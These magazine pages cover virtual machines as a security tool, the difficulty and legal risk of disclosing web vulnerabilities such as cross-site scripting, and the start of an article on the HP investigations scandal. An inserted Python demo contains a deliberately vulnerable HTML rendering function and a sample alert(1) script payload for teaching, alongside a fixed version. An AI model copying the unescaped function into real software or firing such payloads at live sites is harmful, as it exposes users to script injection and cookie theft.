It's faster to work with disk images of virtual computers because today's virtualization servers are better at intelligently managing hard drives than physical servers ever could be. Instead of having a block-by-block copy of the logical drive, virtualization servers employ a variety of compression and remapping techniques so that the virtual disk contains only the disk sectors that the virtual computer actually needs. Some virtualization servers, like Microsoft Virtual PC, can even store virtual disks in two files: a "base" or reference file and a second file that just keeps track of the changes. With this kind of configuration, the second file contains a perfect record of the damage that the spyware has done. To restore the original computer, you just throw away that second file. What could be easier?
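The base-plus-changes layout described above is a copy-on-write overlay, and the reason it doubles as a forensic record is that the overlay holds exactly the sectors the guest rewrote and nothing else. The following is an added toy model of that layout, written for this column rather than taken from Microsoft Virtual PC or any other product; the sector size, the `DiffDisk` class and the constructed sample image are assumptions for illustration. It shows the three operations the column relies on: reads fall through to the base when a sector is untouched, writes land only in the overlay, and reverting the machine is nothing more than discarding the overlay.

```python
"""Toy model of a base-plus-differencing virtual disk (added example, not product code)."""
from __future__ import annotations

from dataclasses import dataclass, field

SECTOR_SIZE = 512  # assumption: fixed 512-byte sectors


def make_reference_image(sector_count: int) -> bytes:
    """Constructed sample 'base' image: sector i is filled with the byte value i % 256."""
    return b"".join(bytes([i % 256]) * SECTOR_SIZE for i in range(sector_count))


@dataclass
class DiffDisk:
    """An immutable base image plus a sparse overlay ("differencing" file)
    holding only the sectors the guest has rewritten."""

    base: bytes
    overlay: dict[int, bytes] = field(default_factory=dict)  # sector index -> new contents

    @property
    def sector_count(self) -> int:
        return len(self.base) // SECTOR_SIZE

    def _base_sector(self, sector: int) -> bytes:
        start = sector * SECTOR_SIZE
        return self.base[start:start + SECTOR_SIZE]

    def _check(self, sector: int) -> None:
        if not 0 <= sector < self.sector_count:
            raise IndexError(f"sector {sector} out of range")

    def read(self, sector: int) -> bytes:
        """Guest read: the overlay wins if the sector was changed, else the base."""
        self._check(sector)
        if sector in self.overlay:
            return self.overlay[sector]
        return self._base_sector(sector)

    def write(self, sector: int, data: bytes) -> None:
        """Guest write: never touches the base; the change lands in the overlay."""
        self._check(sector)
        if len(data) != SECTOR_SIZE:
            raise ValueError("writes must be exactly one sector")
        if data == self._base_sector(sector):
            self.overlay.pop(sector, None)  # restored to original: no longer dirty
        else:
            self.overlay[sector] = data

    def changed_sectors(self) -> list[int]:
        """The overlay is the complete record of what the guest modified."""
        return sorted(self.overlay)

    def revert(self) -> int:
        """Restore the pristine machine by discarding the overlay; returns entries dropped."""
        dropped = len(self.overlay)
        self.overlay.clear()
        return dropped


def run_experiment() -> dict:
    """One crash-and-burn run: a constructed sample rewrites two sectors,
    we record the damage from the overlay alone, then revert."""
    reference = make_reference_image(16)
    disk = DiffDisk(reference)
    disk.write(0, b"\xaa" * SECTOR_SIZE)  # constructed: boot sector altered
    disk.write(9, b"\x55" * SECTOR_SIZE)  # constructed: one data sector altered
    disk.write(3, disk.read(3))           # rewriting unchanged data leaves no trace
    damage = disk.changed_sectors()
    dropped = disk.revert()
    clean = all(
        disk.read(i) == reference[i * SECTOR_SIZE:(i + 1) * SECTOR_SIZE]
        for i in range(disk.sector_count)
    )
    return {"damaged_sectors": damage, "overlay_entries_dropped": dropped, "clean_after_revert": clean}


if __name__ == "__main__":
    print(run_experiment())
```

Two details matter for analysis work. Writing a sector back to its original contents removes it from the overlay, so the change list reflects the end state of the disk rather than every write that ever happened; and the base is never opened for writing, so the reference image stays trustworthy across any number of experiments.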

Throwaway virtual machines can be used for a lot more than testing spyware. Positively the safest way to browse the Web today is to download a copy of the VMware Player and the company's "Browser Appliance" virtual machine. Start it up and within a few seconds you'll have a virtual machine running Ubuntu Linux with a copy of Mozilla Firefox ready to surf. Firefox running on Linux is an extremely secure configuration for browsing the Web. And if some hacking group has managed to find an exploit that allows them to take over your virtual machine, what do you care? The worst that exploit will do is corrupt the virtual machine—there is no way for the hackers' hostile programs to break out of the VMware Player and infect your desktop. Likewise, there is no way for a cross-site scripting attack to steal your home banking authentication cookies, and there's no way for some zero-day exploit to search for your confidential documents.

Remote Possibilities

Organizations can also use the VMware Player as a tool for providing their employees with a consistent set of applications for their home computers or secure remote access. Instead of using a resource-intensive remote-access system like Citrix or Microsoft Terminal Services, you could create a VMware virtual machine that is preconfigured with a trusted operating system, all of your organization's productivity software and a virtual private network client. Employees would run the virtual machine to access company software or network resources, storing their work either in separate virtual disks, in the host operating system or on network shares. Software updates could be distributed as whole-new VMs.

Increasingly, I'm also seeing VMs as a way to protect myself when I'm working on a sensitive network that belongs to a client. Instead of bringing up a VPN client on my home computer, I'll create a VM and use that to connect to the client instead. Now I can be sure that no unrelated activity on my desktop will inadvertently make it into the client's network. Likewise, I'm assured that any confidential information I download will be confined to that VM.

A number of academic researchers are trying to leverage this concept into an easy-to-use desktop interface that would partition the typical home computer into different virtual machines for the different kinds of "roles" that home users typically play. For example, I might have one virtual machine for word processing; a second for doing home banking and other high-value, high-risk activities; a third for browsing the Web and playing games; and a fourth for high-risk activities like running programs that people send me by e-mail.

Although many researchers seem enamored with the idea of using virtualization to solve the spyware problem, I suspect that such a system wouldn't provide nearly as much security as its proponents imagine. The problem is that home users will surely want a way to move information between these different virtual desktops—and as soon as there is a way to move information, attackers might be able to exploit it. For example, an attacker might send the user an e-mail message claiming to be from his bank, which contains an allegedly "mandatory update to your secure home banking virtual machine." Although it is possible to build a virtual machine that allows no communication with other desktop VMs as a matter of policy, it's unlikely that consumers will want to use a system that doesn't allow cut-and-paste between the different desktops.

Going to the Dark Side

Clever security mavens will realize that there's a dark side to all of this virtualization as well. Because the cookies and browser cache files are stored in the virtual machine along with everything else, a bad guy who browses the Web inside VMware's Browser Appliance won't leave any of those telltale forensic trails on his PC. This can make it much harder to prove that someone has been using a computer for illicit purposes such as downloading child pornography. At a recent forensics conference I heard that some sophisticated attackers are doing this today so that they won't leave traces when they break into other machines. Contrary to what's frequently said in the media, virtual machines give us a way to browse the Web, download information and then completely clean a machine so that no trace is left behind.

Virtualization technology can also be used by attackers to hide the existence of viruses, Trojan horses and other kinds of malware, although currently such attacks are strictly in the proof-of-concept phase. The theory here is that the malware becomes the virtualization server itself; the victim operating system then runs as the client. To date the only person who has been able to pull this off is Joanna Rutkowska, a researcher at Coseinc, a Singapore-based IT security consultancy. Rutkowska's creation, called "Blue Pill," was the subject of much media hype last summer when it was first announced. The system is based on AMD's SVM/Pacifica virtualization technology and reportedly can fool even Windows Vista x64. You'll get a more realistic understanding of what the technology can and cannot do by paging through Rutkowska's Black Hat PowerPoint presentation, which you can download from her blog at www.invisiblethings.org.

Virtualization is likely to be as big a step forward for computer security as protected-mode operating systems were back in the 1970s in academia and government (and in the 1990s, when business made the transition from DOS and Windows 95 to Windows NT). It won't be a cure-all, but then again, nothing ever is. ■

Simson Garfinkel, CISSP, is researching computer forensics and human thought at Harvard University. Send feedback to machineshop@cxo.com.


CHILLING EFFECT

How the Web makes creating software vulnerabilities easier, disclosing them more difficult and discovering them possibly illegal

BY SCOTT BERINATO


A DISILLUSIONED SAMARITAN

LAST FEBRUARY at Purdue University, a student taking "cs390s—Secure Computing" told his professor, Dr. Pascal Meunier, that a Web application he used for his physics class seemed to contain a serious vulnerability that made the app highly insecure.

Such a discovery didn't surprise Meunier. "It's a secure computing class; naturally students want to discover vulnerabilities."

They probably want to impress their prof, too, who's a fixture in the vulnerability discovery and disclosure world. Dr. Meunier has created software that interfaces with vulnerability databases. He created ReAssure, a kind of vulnerability playground, a safe computing space to test exploits and perform what Meunier calls "logically destructive experiments." He sits on the board of editors for the Common Vulnerabilities and Exposures (CVE) service, the definitive dictionary of all confirmed software bugs. And he has managed the Vulnerabilities Database and Incident Response Database projects at Purdue's Center for Education and Research in Information and Assurance, or Cerias, an acronym pronounced like the adjective that means "no joke."

When the undergraduate approached Meunier, the professor sensed an educational opportunity and didn't hesitate to get involved. "We wanted to be good citizens and help prevent the exploit from being used," he says. In the context of vulnerable software, it would be the last time Meunier decided to be a good citizen.


IN THIS STORY: The rules of responsible disclosure; the rise of cross-site scripting; new legal risks for security research


Meunier notified the authors of the physics department application that one of his students—he didn't say which one—had found a suspected flaw, "and their response was beautiful," says Meunier. They found, verified and fixed the bug right away, no questions asked.

But two months later, in April, the same physics department website was hacked. A detective approached Meunier, whose name was mentioned by the staff of the vulnerable website during questioning. The detective asked Meunier for the name of the student who had discovered the February vulnerability. The self-described "stubborn idealist" Meunier refused to name the student. He didn't believe it was in that student's character to hack the site and, furthermore, he didn't believe the vulnerability the student had discovered, which had been fixed, was even connected to the April hack.

The detective pushed him. Meunier recalls in his blog: "I was quickly threatened with the possibility of court orders, and the number of felony counts in the incident was brandished as justification for revealing the name of the student." Meunier's stomach knotted when some of his superiors sided with the detective and asked him to turn over the student. Meunier asked himself: "Was this worth losing my job? Was this worth the hassle of responding to court orders, subpoenas, and possibly having my computers (work and personal) seized?" Later, Meunier recast the downward spiral of emotions: "I was miffed, uneasy, disillusioned."

This is not good news for vulnerability research, the game of discovering and disclosing software flaws. True, discovery and disclosure always have been contentious topics in the information security ranks. For many years, no calculus existed for when and how to ethically disclose software vulnerabilities. Opinions varied on who should disclose them, too. Disclosure was a philosophical problem with no one answer but rather, schools of thought. Public shaming adherents advised security researchers, amateurs and professionals alike to go public with software flaws early and often and shame vendors into fixing their flawed code. Back-channel disciples believed in a strong but limited expert community of researchers working with vendors behind the scenes. Many others' disclosure tenets fell in between.

Still, in recent years, with shrink-wrapped software, the community has managed to develop a workable disclosure process. Standard operating procedures for discovering bugs have been accepted and guidelines for disclosing them to the vendor and the public have fallen into place, and they have seemed to work. Economists have even proved a correlation between what they call "responsible disclosure" and improved software security.

But then, right when security researchers were getting good at the disclosure game, the game changed. The most critical code moved to the Internet, where it was highly customized and constantly interacting with other highly customized code. And all this Web code changed often, too, sometimes daily. Vulnerabilities multiplied quickly. Exploits followed.

But researchers had no counterpart methodology for disclosing Web vulnerabilities that mirrored the system for vulnerability disclosure in off-the-shelf software. It's not even clear what constitutes a vulnerability on the Web. Finally, and most serious, legal experts can't yet say whether it's even legal to discover and disclose vulnerabilities on Web applications like the one that Meunier's student found.

To Meunier's relief, the student volunteered himself to the detective and was quickly cleared. But the effects of the episode are lasting. If it had come to it, Meunier says, he would have named the student to preserve his job, and he hated being put in that position. "Even if there turn out to be zero legal consequences" for disclosing Web vulnerabilities, Meunier says, "the inconvenience, the threat of being harassed is already a disincentive. So essentially now my research is restricted."

He ceased using disclosure as a teaching opportunity as well. Meunier wrote a five-point don't-ask-don't-tell plan he intended to give to cs390s students at the beginning of each semester. If they found a Web vulnerability, no matter how serious or threatening, Meunier wrote, he didn't want to hear about it. Furthermore, he said students should "delete any evidence you knew about this problem...go on with your life," although he later amended this advice to say students should report vulnerabilities to CERT/CC.

A gray pall, a palpable chilling effect has settled over the security research community. Many, like Meunier, have decided that the discovery and disclosure game is not worth the risk. The net effect of this is fewer people with good intentions willing to cast a necessary critical eye on software vulnerabilities. That leaves the malicious ones, unconcerned by the legal or social implications of what they do, as the dominant demographic still looking for Web vulnerabilities.

THE RISE OF RESPONSIBLE DISCLOSURE

IN THE same way that light baffles physicists because it behaves simultaneously like a wave and a particle, software baffles economists because it behaves simultaneously like a manufactured good and a creative expression. It's both product and speech. It carries the properties of a car and a novel at the same time. With cars, manufacturers determine quality largely before they're released and the quality can be proven, quantified. Either it has air bags or it doesn't. With novels (the words, not the paper stock and binding), quality depends on what consumers get versus what they want. It is subjective and determined after the book has been released. Moby-Dick is a high-quality creative venture to some and poor quality to others. At any rate, this creates a paradox. If software is both scientifically engineered and creatively conjured, its quality is determined both before and after it's released and is both provable and unprovable.

In fact, says economist Ashish Arora at Carnegie Mellon University, it is precisely this paradox that leads to a world full of vulnerable software. "I'm an economist so I ask myself, Why don't vendors make higher quality software?" After all, in a free market, all other things being equal, a better engineered product should win over a lesser one with rational consumers. But with software, lesser-quality products, requiring massive amounts of repair post-release, dominate. "The truth is, as a manufactured good, it's extraordinarily expensive [and] time-consuming [to make it high quality]." At the same time, as a creative expression, making "quality" software is as indeterminate as the next best-seller. "People use software in so many ways, it's very difficult to anticipate what they want.

"It's terrible to say," Arora concedes, "but in some ways, from an economic perspective, it's more efficient to let the market tell you the flaws once the software is out in the public." The same consumers who complain about flawed software, Arora argues, would neither wait to buy the better software nor pay the price premium for it if more-flawed, less-expensive software were available sooner or at the same time. True, code can be engineered to be more secure. But as long as publishing vulnerable software remains legal, vulnerable software will rule because it's a significantly more efficient market than the alternative, high-security, low-flaw market.

The price consumers pay for supporting cheaper, buggy software is they become an ad hoc quality control department. They suffer the consequences when software fails. But vendors pay a price, too. By letting the market sort out the bugs, vendors have ceded control over who looks for flaws in their software and how flaws are disclosed to the public. Vendors can't control how, when or why a bug is disclosed by a public full of people with manifold motivations and ethics. Some want notoriety. Some use disclosure for corporate marketing. Some do it for a fee. Some have collegial intentions, hoping to improve software quality through community efforts. Some want to shame the vendor into patching through bad publicity. And still others exploit the vulnerabilities to make money illicitly or cause damage.

"Disclosure is one of the main ethical debates in computer security," says researcher Steve Christey. "There are so many perspectives, so many competing interests, that it can be exhausting to try and get some movement forward."

What this system created was a kind of free-for-all in the disclosure bazaar. Discovery and disclosure took place without any controls. Hackers traded information on flaws without informing the vendors. Security vendors built up entire teams of researchers whose job was to dig up flaws and disclose them via press release. Some told the vendors before going public. Others did not. Freelance consultants looked for major flaws to make a name for themselves and drum up business. Sometimes these flaws were so esoteric that they posed minimal real-world risk, but the researcher might not mention that. Sometimes the flaws were indeed serious, but the vendor would try to downplay them. Still other researchers and amateur hackers tried to do the right thing and quietly inform vendors when they found holes in code. Sometimes the vendors chose to ignore them and hope security by obscurity would protect them. Sometimes, Arora alleges, vendors paid mercenaries and politely asked them to keep it quiet while they worked on a fix.

Vulnerability disclosure came to be thought of as a messy, ugly, necessary evil. The madness crested, famously, at the Black Hat hacker conference in Las Vegas in 2005, when a researcher named Michael Lynn prepared to disclose to a room full of hackers and security researchers serious flaws in Cisco's IOS software, the code that controls many of the routers on the Internet. His employer, ISS (now owned by IBM) warned him not to disclose the vulnerabilities. So he quit his job. Cisco in turn threatened legal action and ordered workers to tear out pages from the conference program and destroy conference CDs that contained Lynn's presentation. Hackers accused Cisco of spin and censorship. Vendors accused hackers of unethical and dangerous speech. In the end, Lynn gave his presentation. Cisco sued.
[Chart: Cross-site scripting has shot up the list of most common vulnerabilities. Series shown: cross-site scripting, buffer overflows, SQL injection, directory traversal, PHP include. Source: US-CERT Common Vulnerabilities and Exposures]
Lynn settled and agreed not to talk about it anymore.

The confounding part of all the grandstanding, though, was how unnecessary it was. In fact, as early as 2000, a hacker known as Rain Forest Puppy had written a draft proposal for how responsible disclosure could work. In 2002, researchers Chris Wysopal and Christey picked up on this work and created a far more detailed proposal. Broadly, it calls for a week to establish contact between the researcher finding a vulnerability and a vendor's predetermined liaison on vulnerabilities. Then it gives the vendor, as a general guideline, 30 days to develop a fix and report it to the world through proper channels. It's a head-start program, full disclosure—delayed. It posits that a vulnerability will inevitably become public, so here's an opportunity to create a fix before that happens, since the moment it does become public the risk of exploit increases. Wysopal and Christey submitted the draft to the IETF (Internet Engineering Task Force), where it was well-received but not adopted because it focused more on social standards, not technical ones.

Still, its effects were lasting, and by 2004, many of its definitions and tenets had been folded into the accepted disclosure practices for shrink-wrapped software. By the time Lynn finally took the stage and disclosed Cisco's vulnerabilities, US-CERT, Mitre's CVE dictionary (Christey is editor), and Department of Homeland Security guidelines all used large swaths of Wysopal's and Christey's work.

Recently, economist Arora conducted several detailed economic and mathematical studies on disclosure, one of which seemed to prove that vendors patch software faster when bugs are reported through this system. For packaged software, responsible disclosure works.

FROM BUFFER OVERFLOWS TO CROSS-SITE SCRIPTING

THREE VULNERABILITIES that followed the responsible disclosure process recently are CVE-2006-3873, a buffer overflow in an Internet Explorer DLL file; CVE-2006-3961, a buffer overflow in an ActiveX control in a McAfee product; and CVE-2006-4565, a buffer overflow in the Firefox browser and Thunderbird e-mail program. It's not surprising that all three are buffer overflows. With shrink-wrapped software, buffer overflows have been for years the predominant vulnerability discovered and exploited.

But shrink-wrapped, distributable software, while still proliferating and still being exploited, is a less desirable target for exploiters than it once was. This isn't because shrink-wrapped software is harder to hack than it used to be—the number of buffer overflows discovered has remained steady for half a decade, according to the CVE (see chart on Page 21). Rather, it's because websites have even more vulnerabilities than packaged software, and Web vulnerabilities are as easy to discover and hack and, more and more, that's where hacking is most profitable. In military parlance, webpages provide a target-rich environment.

The speed with which Web vulnerabilities have risen to dominate the vulnerability discussion is startling. Between 2004 and 2006, buffer overflows dropped from the number-one reported class of vulnerability to number four. Counter to that, Web vulnerabilities shot past buffer overflows to take the top three spots. The number-one reported vulnerability, cross-site scripting (XSS), comprised one in five of all CVE-reported bugs in 2006.

To understand XSS is to understand why, from a technical perspective, it will be so hard to apply responsible disclosure principles to Web vulnerabilities.

Cross-site scripting (which is something of a misnomer) uses vulnerabilities in webpages to insert code, or scripts. The code is injected into the vulnerable site unwittingly by the victim, who usually clicks on a link that has HTML and JavaScript embedded in it. (Another variety, less common and more serious, doesn’t require a click.) The link might promise a free iPod or simply seem so innocuous, a link to a news story, say, that the user won’t deem it dangerous. Once clicked, though, the embedded exploit executes on the targeted website’s server.

The scripts will usually have a malicious intent—from simply defacing the website to stealing cookies or passwords, or redirecting the user to a fake webpage embedded in a legitimate site, a high-end phishing scheme that affected PayPal last year. A buffer overflow targets an application. But XSS is, as researcher Jeremiah Grossman (founder of WhiteHat Security) puts it, “an attack on the user, not the system.” It requires the user to visit the vulnerable site and participate in executing the code.
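The link-and-echo mechanism just described, as an added example that is not code from the article or from any site it names: a search page that pastes its query parameter straight into the HTML it returns (the bug), the same page with output encoding (the fix), and a check that tells the two apart. The site name, the parameter name and the two sample links are constructed for the example.

```python
"""Reflected cross-site scripting (XSS): a site repeats part of a URL into its
page, a link carries markup in that part, and the markup becomes part of the
page the site serves back to whoever clicked.

Added example, not code from the article or from any site it names. The
search page, its 'q' parameter and the sample links are all constructed.
"""
import html
from urllib.parse import parse_qs, urlsplit

# Constructed sample links of the kind the article describes: one a normal
# news-site search, the other carrying the classic harmless proof of concept
# (a pop-up dialog) in the very same parameter.
BENIGN_LINK = "https://news.example.test/search?q=election+results"
POC_LINK = "https://news.example.test/search?q=<script>alert(1)</script>"


def query_from_link(url: str) -> str:
    """Return the 'q' value a browser would send after the link is clicked."""
    params = parse_qs(urlsplit(url).query)
    return params.get("q", [""])[0]


def render_results_vulnerable(query: str) -> str:
    """The bug: the parameter is pasted verbatim into HTML, so any tags it
    carries become part of the page the site serves, and the visitor's browser
    runs them in the site's context (its cookies, its session). Kept
    deliberately broken for contrast with the hardened version below."""
    return f"<h1>Results for {query}</h1>"


def render_results_hardened(query: str) -> str:
    """The fix: encode untrusted text for the HTML context it lands in.
    html.escape turns <, >, & and both quote characters into entities, so the
    same input is displayed as text instead of being interpreted as markup."""
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"


def reflects_markup(rendered_page: str, untrusted: str) -> bool:
    """Defender's check for one handler: does input that contains a tag come
    back in the response byte-for-byte? That is the reflected-XSS condition;
    an escaped copy of the input does not satisfy it."""
    looks_like_markup = "<" in untrusted and ">" in untrusted
    return looks_like_markup and untrusted in rendered_page


if __name__ == "__main__":
    for link in (BENIGN_LINK, POC_LINK):
        q = query_from_link(link)
        for label, render in (("vulnerable", render_results_vulnerable),
                              ("hardened", render_results_hardened)):
            page = render(q)
            verdict = "REFLECTED" if reflects_markup(page, q) else "ok"
            print(f"{label:10} {verdict:9} {page}")
```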

This is reason number one it’s harder to disclose Web vulnerabilities. What exactly is the vulnerability in this XSS scenario? Is it the design of the page? Yes, in part. But often, it’s also the social engineering performed on the user and his browser. A hacker who calls himself RSnake and who’s regarded in the research community as an expert on XSS goes even further, saying, “[XSS is] a gateway. All it means is I can pull some code in from somewhere.” In some sense it is like the door to a house. Is a door a vulnerability? Or is it when it’s left unlocked that it becomes a vulnerability? When do you report a door as a weakness—when it’s just there, when it’s left unlocked, or when someone illegally or unwittingly walks through it? In the same way, it’s possible to argue that careless users are as much to blame for XSS as software flaws. For the moment, let’s treat XSS, the ability to inject code, as a technical vulnerability.

Problem number two with disclosure of XSS is its prevalence. Grossman, who founded his own research company, White Hat, claims XSS vulnerabilities can be found in 70 percent of websites. RSnake goes further. “I know Jeremiah says seven of 10. I’d say there’s only one in 30 I come across where the XSS isn’t totally obvious. I don’t know of a company I couldn’t break into [using XSS].”

If you apply Grossman’s number to a recent Netcraft survey, which estimated that there are close to 100 million websites, you’ve got 70 million sites with XSS vulnerabilities. Repairing them one-off, two-off, 200,000-off is spitting in the proverbial ocean. Even if you’ve disclosed, you’ve done very little to reduce the overall risk of exploit. “Logistically, there’s no way to disclose this stuff to all the interested parties,” Grossman says. “I used to think it was my moral professional duty to report every vulnerability, but it would take up my whole day.”

What’s more, new XSS vulnerabilities are created all the time, first because many programming languages have been made so easy to use that amateurs can rapidly build highly insecure webpages. And second because, in those slick, dynamic pages commonly marketed as “Web 2.0,” code is both highly customized and constantly changing, says Wysopal, who is now CTO of VeriCode. “For example, look at IIS [Microsoft’s shrink-wrapped Web server software],” he says. “For about two years people were hammering on that and disclosing all kinds of flaws. But in the last couple of years, there have been almost no new vulnerabilities with IIS. It went from being a dog to one of the highest security products out there. But it was one code base and lots of give-and-take between researchers and the vendor, over and over.

“On the Web, you don’t have that give and take,” he says. You can’t continually improve a webpage’s code because “Web code is highly customized. You won’t see the same code on two different banking sites, and the code changes all the time.”

That means, in the case of Web vulnerabilities, says Christey, “every input and every button you can press is a potential place to attack. And because so much data is moving you can lose complete control. Many of these vulnerabilities work by mixing code where you expect to mix it. It creates flexibility but it also creates an opportunity for hacking.”

There are in fact so many variables in a Web session—how the site is configured and updated, how the browser visiting the site is configured to interact with the site—that vulnerabilities to some extent become a function of complexity. They may affect some subset of users—people who use one browser over another, say. When it’s difficult to even recreate the set of variables that comprise a vulnerability, it’s hard to responsibly disclose that vulnerability.

“In some ways,” RSnake says, “there is no hope. I’m not comfortable telling companies that I know how to protect them from this.”

A WAKE-UP CALL FOR WEBSITES

AROUND BREAKFAST one day late last August, RSnake started a thread on his discussion board, Sla.ckers.org, a site frequented by hackers and researchers looking for interesting new exploits and trends in Web vulnerabilities. RSnake’s first post was titled “So it begins.” All that followed were two links, www.alexa.com and www.altavista.com, and a short note: “These have been out there for a while but are still unfixed.” Clicking on the links exploited XSS vulnerabilities with a reasonably harmless, proof-of-concept script. RSnake had disclosed vulnerabilities.

He did this because he felt the research community and, more to the point, the public at large, neither understood nor respected the seriousness and prevalence of XSS. It was time, he says, to do some guerilla vulnerability disclosure. “I want them to understand this isn’t Joe Shmoe finding a little hole and building a phishing site,” RSnake says. “This is one of the pieces of the puzzle that could be used as a nasty tool.”

If that first post didn’t serve as a wake-up call, what followed it should. Hundreds of XSS vulnerabilities were disclosed by the regular klatch of hackers at the site. Most exploited well-known, highly trafficked sites. Usually the posts included a link that included a proof-of-concept exploit. An XSS hole in www.gm.com, for example, simply delivered a pop-up dialog box with an exclamation mark in the box. By early October, anonymous lurkers were contributing long lists of XSS-vulnerable sites. In one set of these, exploit links connected to a defaced page with Sylvester Stallone’s picture on it and the message “This page has been hacked! You got Stallown3d!l” The sites this hacker contributed included the websites of USA Today, The New York Times, The Boston Globe, ABC, CBS, Warner Bros., Petco, Nike, and Linens ’n Things. “What can I say?” RSnake wrote. “We have some kick-ass lurkers here.”

Some of the XSS holes were closed up shortly after appearing on the site. Others remain vulnerable. At least one person tried to get the discussion board shut down, RSnake says, and a couple of others “didn’t react in a way that I thought was responsible.” Contacts from a few of the victim sites—Google and Mozilla, among others—called to tell RSnake they’d fixed the problem and “to say thanks through gritted teeth.” Most haven’t contacted him, and he suspects most know about neither the discussion thread nor their XSS vulnerabilities.

By early November last year, the number of vulnerable sites posted reached 1,000, many discovered by RSnake himself. His signature on his posts reads “RSnake—Gotta love it.” It connotes an aloofness that permeates the discussion thread, as if finding XSS vulnerabilities were too easy. It’s fun but hardly professionally interesting, like Tom Brady playing flag football.

Clearly, this is not responsible disclosure by the standards shrink-wrapped software has come to be judged, but RSnake doesn’t think responsible disclosure, even if it were somehow developed for Web vulnerabilities (and we’ve already seen how hard that will be, technically), can work. For one, he says, he’d be spending all day filling out vulnerability reports. But more to the point, “If I went out of my way to tell them they’re vulnerable, they may or may not fix it, and, most importantly, the public doesn’t get that this is a big problem.”

DISCOVERY IS (NOT?) A CRIME

RSNAKE IS not alone in his skepticism over proper channels being used for something like XSS vulnerabilities. Wysopal himself says that responsible disclosure guidelines, ones he helped develop, “don’t apply at all with Web vulnerabilities.” Implicit in his and Christey’s process was the idea that the person disclosing the vulnerabilities was entitled to discover them in the first place, that the software was theirs to inspect. (Even on your own software, the end user license agreement—EULA—and the Digital Millennium Copyright Act—DMCA—limit what you can do with/to it.) The seemingly endless string of websites RSnake and the small band of hackers had outed were not theirs to audit.

Disclosing the XSS vulnerabilities on those websites was implicitly confessing to having discovered that vulnerability. Posting the exploit code—no matter how innocuous—was definitive proof of discovery. That, it turns out, might be illegal.

No one knows for sure yet if it is, but how the law develops will determine whether vulnerability research will get back on track or devolve into the unorganized bazaar that it once was and that RSnake’s discussion board hints it could be.

The case law in this space is sparse, but one of the few recent cases that address vulnerability discovery is not encouraging.


A man named Eric McCarty, after allegedly being denied admission to the University of Southern California, hacked the online admission system, copied seven records from the database and mailed the information under a pseudonym to a security news website. The website notified the university and subsequently published information about the vulnerability. McCarty made little attempt to cover his tracks and even blogged about the hack. Soon enough, he was charged with a crime. The case is somewhat addled, says Jennifer Granick, a prominent lawyer in the vulnerability disclosure field and executive director at Stanford’s Center for Internet and Society. “The prosecutor argued that it’s because he copied the data and sent it to an unauthorized person that he’s being charged,” says Granick, “but copying data isn’t illegal. So you’re prosecuting for unauthorized testing of the system”—what any Web vulnerability discoverer is doing—“but you’re motivated by what they did with the information. It’s kind of scary.”

Two cases in a similar vein preceded McCarty’s. One was acquitted in less than half an hour, Granick says; in the other, prosecutors managed to convict the hacker, but, in a strange twist, they dropped the conviction on appeal (Granick represented the defendant on the appeal). In the USC case, though, McCarty pleaded guilty to unauthorized access. Granick calls this “terrible and detrimental.”

“Law says you can’t access computers without permission,” she explains. “Permission on a website is implied. So far, we’ve relied on that. The Internet couldn’t work if you had to get permission every time you wanted to access something. But what if you’re using a website in a way that’s possible but that the owner didn’t intend? The question is whether the law prohibits you from exploring all the ways a website works,” including through vulnerabilities.

Granick would like to see a rule established that states it’s not illegal to report truthful information about a website vulnerability, when that information is gleaned from taking the steps necessary to find the vulnerability, in other words, benevolently exploiting it. “Reporting how a website works has to be different than attacking a website,” she says. “Without it, you encourage bad disclosure, or people won’t do it at all because they’re afraid of the consequences.” Already many researchers, including Meunier at Purdue, have come to view a request for a researcher’s proof-of-concept exploit code as a potentially aggressive tactic. Handing it over, Meunier says, is a bad idea because it’s proof that you’ve explored the website in a way the person you’re giving the code to did not intend. The victim you’re trying to help could submit that as Exhibit A in a criminal trial against you.

RSnake says he thought about these issues before he started his discussion thread. “I went back and forth personally,” he says. “Frankly, I don’t think it’s really illegal. I have no interest in exploiting the Web.” As for others on the discussion board, “everyone on my board, I believe, is nonmalicious.” But he acknowledges that the specter of illegality and the uncertainty surrounding Web vulnerability disclosure are driving some researchers away and driving others, just as Granick predicted, to try to disclose anonymously or through back channels, which he says is unfortunate. “We’re like a security lab. Trying to shut us down is the exact wrong response. It doesn’t make the problem go away. If anything, it makes it worse. What we’re doing is not meant to hurt companies. It’s meant to make them protect themselves. I’m a consumer advocate.”

A LIMITED POOL OF BRAVERY

What happens next depends, largely, on those who publish vulnerable software on the Web. Will those with vulnerable websites, instead of attacking the messenger, work with the research community to develop some kind of responsible disclosure process for Web vulnerabilities, as complex and uncertain a prospect as that is? Christey remains optimistic. “Just as with shrink-wrapped software five years ago, there are no security contacts and response teams for Web vulnerabilities. In some ways, it’s the same thing over again. If the dynamic Web follows the same pattern, it will get worse before it gets better, but at least we’re not at square one.” Christey says his hope rests in part on an efficacious public that demands better software and a more secure Internet, something he says hasn’t materialized yet.

Or will they start suing, threatening, harassing those who discover and disclose their Web vulnerabilities regardless of the researchers’ intention, confidently cutting the current with the winds of McCarty’s guilty plea filling their sails? Certainly this prospect concerns legal scholars and researchers, even ones who are pressing forward and discovering and disclosing Web vulnerabilities despite the current uncertainty and risk. Noble as his intentions may be, RSnake is not in the business of martyrdom. He says, “If the FBI came to my door [asking for information on people posting to the discussion board], I’d say ‘Here’s their IP address.’ I do not protect them. They know that.”

He sounds much as Meunier did when he conceded that he’d have turned over his student if it had come to that. In the fifth and final point he provides for students telling them that he wants no part of their vulnerability discovery and disclosure, he writes: “I’ve exhausted my limited pool of bravery. Despite the possible benefits to the university and society at large, I’m intimidated by the possible consequences to my career, bank account and sanity. I agree with [noted security researcher] H.D. Moore, as far as production websites are concerned: ‘There is no way to report a vulnerability safely.’” ■

E-mail feedback to Senior Editor Scott Berinato at sberinato@cxo.com.
Things About Corporate Investigations That Won’t Change As a Result of the Hewlett-Packard Scandal

BY SARAH D. SCALET


ON MAY 24, 2006, Hewlett-Packard’s director of ethics sent out an internal memo stamped “Attorney-Client Privileged” that contained 12 pages’ worth of detective work that would make any sleuth stand proud.

The memo, sent by Kevin T. Hunsaker to the company’s CEO, general counsel and board of directors (and made public after a congressional hearing this past September), summarized the work that a group of HP investigators had done to determine an unnamed source for an article published by CNET on Jan. 23, 2006. The article contained details about a board meeting that HP chairwoman Patricia Dunn did not want made public. In painstaking detail, the investigative team laid out its findings.

